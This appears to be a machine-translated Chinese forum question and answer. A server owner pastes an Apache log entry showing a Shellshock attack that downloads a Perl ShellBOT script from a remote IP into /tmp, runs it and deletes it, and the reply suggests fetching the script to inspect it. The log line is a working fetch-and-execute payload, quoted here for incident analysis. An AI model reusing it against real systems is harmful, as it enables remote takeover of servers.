有人问过类似的问题，但它们要么对我不起作用，要么我不明白答案。
我运行Apache2网络服务器并托管一些小的个人网站我被网络跟踪了，或者有人试图入侵我。
Apache2访问日志显示
195.154.80.205--[2015年11月5日：09:57:09+0000]“获取/info.cgi http/1.1”404 464“-”“）{：；}/usr/bin/perl-e‘print’”内容类型：text/plain\r\n\r\nxSuccess！\“系统（\”wgethttp://190.186.76.252/cox.pl-O/tmp/cox.pl；curl-O/tmp/cox.plhttp://190.186.76.252/cox.pl;perl/tmp/cox.pl；rm-rf/tmp/cox.pl*“）；”
很明显，它试图（在我的日志中反复）强制我的服务器下载“cox.pl”，然后运行“cox.pl”，然后删除“cox.pl”。
我真的想知道cox.pl中的内容，它可能是github上的Cox-Data-Usage的修改版本。
我想要一个脚本，它将持续监视我的/tmp文件夹，当添加一个新文件时，将该文件复制到另一个目录，以便我查看它正在做什么，或者至少尝试做什么。
我知道我可以拒绝访问等，但我想知道这些黑客正在做什么，看看我是否可以收集有关他们的情报。

这个脚本很容易下载，它包含ShellBOT by: devil__所以…猜猜；-）
您可以使用tutorial_notifier.py中的pyinotify，但不需要使用此特定情况。就这么做

curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt